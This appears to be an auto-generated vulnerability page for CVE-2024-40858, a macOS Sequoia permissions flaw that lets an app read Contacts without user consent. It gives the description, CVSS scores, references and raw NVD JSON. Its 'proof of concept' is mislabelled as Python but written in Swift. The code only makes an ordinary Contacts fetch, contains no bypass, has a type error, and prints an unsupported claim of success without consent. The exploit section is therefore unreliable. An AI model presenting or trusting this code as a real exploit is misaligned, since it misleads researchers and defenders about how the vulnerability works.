CVE-2024-40858

Description

A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.1. An app may be able to access Contacts without user consent.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

macOS Sequoia < 15.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import Contacts
import Foundation

// Proof of Concept for CVE-2024-40858
// This code demonstrates unauthorized access to Contacts
// Exploiting the permission bypass vulnerability in macOS Sequoia < 15.1

func exploitContactAccess() {
    let store = CNContactStore()
    let keys = [CNContactGivenNameKey, CNContactFamilyNameKey, CNContactPhoneNumbersKey]
    
    // In a vulnerable system, this request might succeed without prompting the user
    // or checking the authorization status properly due to the logic flaw.
    let request = CNContactFetchRequest(keysToFetch: keys as [CNKeyDescriptor])
    
    do {
        try store.enumerateContacts(with: request) { contact, stop in
            print("Contact: \(contact.givenName) \(contact.familyName)")
            if let numbers = contact.phoneNumbers {
                for num in numbers {
                    print("Number: \(num.value.stringValue)")
                }
            }
        }
        print("Successfully accessed contacts without user consent.")
    } catch {
        print("Failed to access contacts: \(error)")
    }
}

// Execute the PoC
exploitContactAccess()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-40858
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-40858
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-40858/
[4] VulDB https://vuldb.com/cve/CVE-2024-40858
[5] https://support.apple.com/en-us/121564

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-40858", "sourceIdentifier": "[email protected]", "published": "2026-04-02T19:17:59.077", "lastModified": "2026-04-03T17:55:10.113", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Sequoia 15.1. An app may be able to access Contacts without user consent."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.1", "matchCriteriaId": "1D298E1D-DD23-4D35-9DE4-E3F5999F97AA"}]}]}], "references": [{"url": "https://support.apple.com/en-us/121564", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}